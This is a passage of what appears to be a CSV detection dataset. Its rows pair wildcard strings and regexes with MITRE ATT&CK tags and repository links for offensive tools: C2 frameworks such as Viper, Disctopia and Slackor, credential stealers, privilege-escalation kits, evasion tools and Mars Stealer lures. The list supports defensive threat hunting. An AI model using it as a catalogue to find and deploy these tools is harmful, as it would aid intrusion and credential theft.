Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","385","56","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" "*Disabling ASLR *",".{0,1000}Disabling\sASLR\s.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","75","18","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "*discordapp.com/attachments/*/AnyDesk.exe*",".{0,1000}discordapp\.com\/attachments\/.{0,1000}\/AnyDesk\.exe.{0,1000}","offensive_tool_keyword","anydesk","Fake Anydesk distributed by discord - mars stealer","T1566 T1587","N/A","N/A","N/A","Malware","https://www.virustotal.com/gui/url/f83616f0f9cd2337ed40e22b0a675a99d58edf004b31645f56f28f020f5e4f46/detection","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*discordapp.com/attachments/*/BOINCPortable_*.exe*",".{0,1000}discordapp\.com\/attachments\/.{0,1000}\/BOINCPortable_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","BOINC","Fake BOINC software distributed by discord - mars stealer","T1566 T1587","N/A","N/A","N/A","Malware","https://cyberint.com/wp-content/uploads/2022/02/Mars-Stealer-7.png.webp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Discovery_AccountDiscovery_GetNetDomainUser.py*",".{0,1000}Discovery_AccountDiscovery_GetNetDomainUser\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_AccountDiscovery_PowerView.py*",".{0,1000}Discovery_AccountDiscovery_PowerView\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_ApplicationWindowDiscovery_EnumApplication.py*",".{0,1000}Discovery_ApplicationWindowDiscovery_EnumApplication\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_Microphone_CallInfo.py*",".{0,1000}Discovery_Microphone_CallInfo\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_Microphone_camera.py*",".{0,1000}Discovery_Microphone_camera\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_Microphone_record_mic.py*",".{0,1000}Discovery_Microphone_record_mic\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_NetworkServiceScanning_ARPScan.py*",".{0,1000}Discovery_NetworkServiceScanning_ARPScan\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_NetworkServiceScanning_NbtScanByPython.py*",".{0,1000}Discovery_NetworkServiceScanning_NbtScanByPython\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_NetworkServiceScanning_NextnetByPE.py*",".{0,1000}Discovery_NetworkServiceScanning_NextnetByPE\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_NetworkServiceScanning_PingByPython.py*",".{0,1000}Discovery_NetworkServiceScanning_PingByPython\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_NetworkServiceScanning_PortScanByPython.py*",".{0,1000}Discovery_NetworkServiceScanning_PortScanByPython\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_NetworkServiceScanning_PortScanWithServiceByPython.py*",".{0,1000}Discovery_NetworkServiceScanning_PortScanWithServiceByPython\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_NetworkShareDiscovery_PowerView.py*",".{0,1000}Discovery_NetworkShareDiscovery_PowerView\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_PermissionGroupsDiscovery_PowerView.py*",".{0,1000}Discovery_PermissionGroupsDiscovery_PowerView\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*discovery_port_scan*",".{0,1000}discovery_port_scan.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*Discovery_QueryRegistry_GetDotNetVersions.py*",".{0,1000}Discovery_QueryRegistry_GetDotNetVersions\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_QueryRegistry_GetRDPPort.py*",".{0,1000}Discovery_QueryRegistry_GetRDPPort\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_RemoteSystemDiscovery_GetDomainIPAddress.py*",".{0,1000}Discovery_RemoteSystemDiscovery_GetDomainIPAddress\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_RemoteSystemDiscovery_GetNetComputer.py*",".{0,1000}Discovery_RemoteSystemDiscovery_GetNetComputer\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_RemoteSystemDiscovery_GetNetDomain.py*",".{0,1000}Discovery_RemoteSystemDiscovery_GetNetDomain\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_RemoteSystemDiscovery_GetNetDomainController.py*",".{0,1000}Discovery_RemoteSystemDiscovery_GetNetDomainController\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_SecuritySoftwareDiscovery_ListAVByTasklist.py*",".{0,1000}Discovery_SecuritySoftwareDiscovery_ListAVByTasklist\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_SystemNetworkConnectionsDiscovery_GetPublicIP.py*",".{0,1000}Discovery_SystemNetworkConnectionsDiscovery_GetPublicIP\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_SystemUserDiscovery_GetLastLoggedOn.py*",".{0,1000}Discovery_SystemUserDiscovery_GetLastLoggedOn\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_SystemUserDiscovery_GetLoggedOnLocal.py*",".{0,1000}Discovery_SystemUserDiscovery_GetLoggedOnLocal\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Disctopia Backdoor*",".{0,1000}Disctopia\sBackdoor.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","0","N/A","10","10","336","85","2024-02-10T13:46:58Z","2022-01-02T22:03:10Z" "*disctopia-c2.git*",".{0,1000}disctopia\-c2\.git.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","336","85","2024-02-10T13:46:58Z","2022-01-02T22:03:10Z" "*disctopia-c2-main.zip*",".{0,1000}disctopia\-c2\-main\.zip.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","336","85","2024-02-10T13:46:58Z","2022-01-02T22:03:10Z" "*DiskCryptor Device Installation Disk*",".{0,1000}DiskCryptor\sDevice\sInstallation\sDisk.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*DiskCryptor driver*",".{0,1000}DiskCryptor\sdriver.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*DISKCRYPTOR_MUTEX*",".{0,1000}DISKCRYPTOR_MUTEX.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*diskcryptor2john.py*",".{0,1000}diskcryptor2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*DiskCryptor-master*",".{0,1000}DiskCryptor\-master.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*display_privilege_escalation_options(*",".{0,1000}display_privilege_escalation_options\(.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*dist*_brc4.x64.o*",".{0,1000}dist.{0,1000}_brc4\.x64\.o.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*dist*_brc4.x86.o*",".{0,1000}dist.{0,1000}_brc4\.x86\.o.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*dist/agent.upx.exe*",".{0,1000}dist\/agent\.upx\.exe.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*dist/agent.windows.exe*",".{0,1000}dist\/agent\.windows\.exe.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*dist/coercedpotato.cna*",".{0,1000}dist\/coercedpotato\.cna.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*dist/nanorobeus_cs.*",".{0,1000}dist\/nanorobeus_cs\..{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*dist/shadow.exe*",".{0,1000}dist\/shadow\.exe.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*dist\shadow.exe*",".{0,1000}dist\\shadow\.exe.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*dist-packages/tor2web/*",".{0,1000}dist\-packages\/tor2web\/.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*ditty/ditty.c*",".{0,1000}ditty\/ditty\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SimoneLazzaris/ditty","1","1","N/A","N/A","1","2","1","2022-03-10T16:15:14Z","2022-03-09T09:20:27Z" "*Dive Shell - Emperor Hacking Team*",".{0,1000}Dive\sShell\s\-\sEmperor\sHacking\sTeam.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*diversenok/TokenUniverse*",".{0,1000}diversenok\/TokenUniverse.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "*djhohnstein/SharpChromium*",".{0,1000}djhohnstein\/SharpChromium.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","651","99","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*DKMC-master.zip*",".{0,1000}DKMC\-master\.zip.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*DLHell v2.0*",".{0,1000}DLHell\sv2\.0.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*DLHell.py -*",".{0,1000}DLHell\.py\s\-.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*dlink_central_wifimanager_rce.*",".{0,1000}dlink_central_wifimanager_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*dlink_sharecenter_cmd_exec*",".{0,1000}dlink_sharecenter_cmd_exec.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*dlink_telnet_backdoor_userpass*",".{0,1000}dlink_telnet_backdoor_userpass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to 